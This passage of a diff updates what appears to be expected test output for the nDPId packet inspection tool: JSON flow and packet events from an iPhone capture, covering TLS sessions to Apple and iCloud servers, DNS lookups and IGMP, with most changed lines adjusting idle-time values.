47-keyvalueservice.icloud.com,p48-keyvalueservice.icloud.com,p20-keyvalueservice.icloud.com,p51-keyvalueservice.icloud.com,p27-keyvalueservice.icloud.com,p49-keyvalueservice.icloud.com,p03-keyvalueservice.icloud.com,p24-keyvalueservice.icloud.com,p25-keyvalueservice.icloud.com,p08-keyvalueservice.icloud.com,p13-keyvalueservice.icloud.com,p04-keyvalueservice.icloud.com,p05-keyvalueservice.icloud.com,p02-keyvalueservice.icloud.com,p09-keyvalueservice.icloud.com,p57-keyvalueservice.icloud.com,p59-keyvalueservice.icloud.com,p64-keyvalueservice.icloud.com,p38-keyvalueservice.icloud.com,p54-keyvalueservice.icloud.com,p72-keyvalueservice.icloud.com,keyvalueservice.icloud.com,p69-keyvalueservice.icloud.com,p43-keyvalueservice.icloud.com,p45-keyvalueservice.icloud.com,p202-keyvalueservice.icloud.com,p98-keyvalueservice.icloud.com,p34-keyvalueservice.icloud.com,p44-keyvalueservice.icloud.com,p46-keyvalueservice.icloud.com,p53-keyvalueservice.icloud.com,p60-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=keyvalueservice.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D8:84:3B:15:06:49:1C:72:C4:05:C0:F0:82:3B:43:4A:D1:8F:D5:9F"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598888,"flow_last_seen":1582454598888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598888,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454598888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG0pfAqAIRaEk9HsWXAbvBeeAaAAAAALDC\/\/9qCgAAAgQFtAEDAwcBAQgKEd\/pSQAAAAAEAgAA"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454598888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGHz7AqAIRXHr8UsWWAbuHn+lThYjGHYAQBAuvrgAAAQEIChHf6Un\/dyjx"} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598766,"flow_last_seen":1582454598889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598889,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454598892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598892,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrLvAqAIREfi5V8WVAbuoGt7pnxPiJoAQBAsEtQAAAQEIChHf6VPpLCwF"} +00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598721,"flow_last_seen":1582454598893,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598893,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598766,"flow_last_seen":1582454598926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598926,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454598926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598926,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGHZxoST0ewKgCEQG7xZdpIXVbwXngG6BScSBpXgAAAgQFrAQCCAqgrSHdEd\/pSQEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1582454598934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598934,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG0qPAqAIRaEk9HsWXAbvBeeAbaSF1XIAQBAsFUQAAAQEIChHf6XCgrSHd"} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598888,"flow_last_seen":1582454598934,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598888,"flow_last_seen":1582454598974,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598974,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598721,"flow_last_seen":1582454599041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599041,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03624{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":237,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1582454598721,"flow_last_seen":1582454599054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":697,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","server_names":"p62-keyvalueservice.icloud.com,p41-keyvalueservice.icloud.com,p97-keyvalueservice.icloud.com,p28-keyvalueservice.icloud.com,p32-keyvalueservice.icloud.com,p56-keyvalueservice.icloud.com,p33-keyvalueservice.icloud.com,p37-keyvalueservice.icloud.com,p67-keyvalueservice.icloud.com,p70-keyvalueservice.icloud.com,p63-keyvalueservice.icloud.com,p07-keyvalueservice.icloud.com,p52-keyvalueservice.icloud.com,p18-keyvalueservice.icloud.com,p21-keyvalueservice.icloud.com,p17-keyvalueservice.icloud.com,p36-keyvalueservice.icloud.com,p19-keyvalueservice.icloud.com,p26-keyvalueservice.icloud.com,p55-keyvalueservice.icloud.com,p06-keyvalueservice.icloud.com,p23-keyvalueservice.icloud.com,p65-keyvalueservice.icloud.com,p58-keyvalueservice.icloud.com,p35-keyvalueservice.icloud.com,p42-keyvalueservice.icloud.com,p12-keyvalueservice.icloud.com,p15-keyvalueservice.icloud.com,p16-keyvalueservice.icloud.com,p29-keyvalueservice.icloud.com,p39-keyvalueservice.icloud.com,p71-keyvalueservice.icloud.com,p22-keyvalueservice.icloud.com,p40-keyvalueservice.icloud.com,p11-keyvalueservice.icloud.com,p66-keyvalueservice.icloud.com,p68-keyvalueservice.icloud.com,p201-keyvalueservice.icloud.com,p10-keyvalueservice.icloud.com,p61-keyvalueservice.icloud.com,p30-keyvalueservice.icloud.com,p01-keyvalueservice.icloud.com,p14-keyvalueservice.icloud.com,p50-keyvalueservice.icloud.com,p31-keyvalueservice.icloud.com,p47-keyvalueservice.icloud.com,p48-keyvalueservice.icloud.com,p20-keyvalueservice.icloud.com,p51-keyvalueservice.icloud.com,p27-keyvalueservice.icloud.com,p49-keyvalueservice.icloud.com,p03-keyvalueservice.icloud.com,p24-keyvalueservice.icloud.com,p25-keyvalueservice.icloud.com,p08-keyvalueservice.icloud.com,p13-keyvalueservice.icloud.com,p04-keyvalueservice.icloud.com,p05-keyvalueservice.icloud.com,p02-keyvalueservice.icloud.com,p09-keyvalueservice.icloud.com,p57-keyvalueservice.icloud.com,p59-keyvalueservice.icloud.com,p64-keyvalueservice.icloud.com,p38-keyvalueservice.icloud.com,p54-keyvalueservice.icloud.com,p72-keyvalueservice.icloud.com,keyvalueservice.icloud.com,p69-keyvalueservice.icloud.com,p43-keyvalueservice.icloud.com,p45-keyvalueservice.icloud.com,p202-keyvalueservice.icloud.com,p98-keyvalueservice.icloud.com,p34-keyvalueservice.icloud.com,p44-keyvalueservice.icloud.com,p46-keyvalueservice.icloud.com,p53-keyvalueservice.icloud.com,p60-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=keyvalueservice.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D8:84:3B:15:06:49:1C:72:C4:05:C0:F0:82:3B:43:4A:D1:8F:D5:9F"}} 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454599054,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1582454599054,"pkt":"AQBeAAAWxGGLNYKpCABGAAAoAABAAAECQgDAqAIR4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7"} 00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} @@ -215,82 +215,82 @@ 00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454599105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1582454599105,"pkt":"xGGLNYKpxiwDYGpkCABFAABx6W4AAEARC6vAqAIBwKgCEQA1yz8AXf6hdCWBgAABAAIAAAAAA2dzYQVhcHBsZQNjb20AAAEAAcAMAAUAAQAAEZYAGgNnc2EFYXBwbGUDY29tBmFrYWRucwNuZXQAwCsAAQABAAAA4QAEEYmmIw=="} 00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599225,"flow_last_seen":1582454599225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599225,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454599225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599225,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WYAbuypew6AAAAALDC\/\/9PDwAAAgQFtAEDAwcBAQgKEd\/qGwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454599259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599259,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZj0WnUXsqXsO6BScSAj8wAAAgQFrAEBCApbEwn1Ed\/qGwEDAwU="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1582454599261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599261,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WYAbuypew79Fp1GIAQBAu8hwAAAQEIChHf6p1bEwn1"} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599225,"flow_last_seen":1582454599261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454599261,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":270,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599225,"flow_last_seen":1582454599295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599295,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":272,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599225,"flow_last_seen":1582454599297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599297,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599396,"flow_last_seen":1582454599396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599396,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1582454599396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599396,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGwFLAqAIREYmmI8WZAbu9h96xAAAAALDC\/\/9bXgAAAgQFtAEDAwcBAQgKEd\/rCQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599225,"flow_last_seen":1582454599225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599225,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454599225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599225,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WYAbuypew6AAAAALDC\/\/9PDwAAAgQFtAEDAwcBAQgKEd\/qGwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454599259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599259,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZj0WnUXsqXsO6BScSAj8wAAAgQFrAEBCApbEwn1Ed\/qGwEDAwU="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1582454599261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454599261,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WYAbuypew79Fp1GIAQBAu8hwAAAQEIChHf6p1bEwn1"} 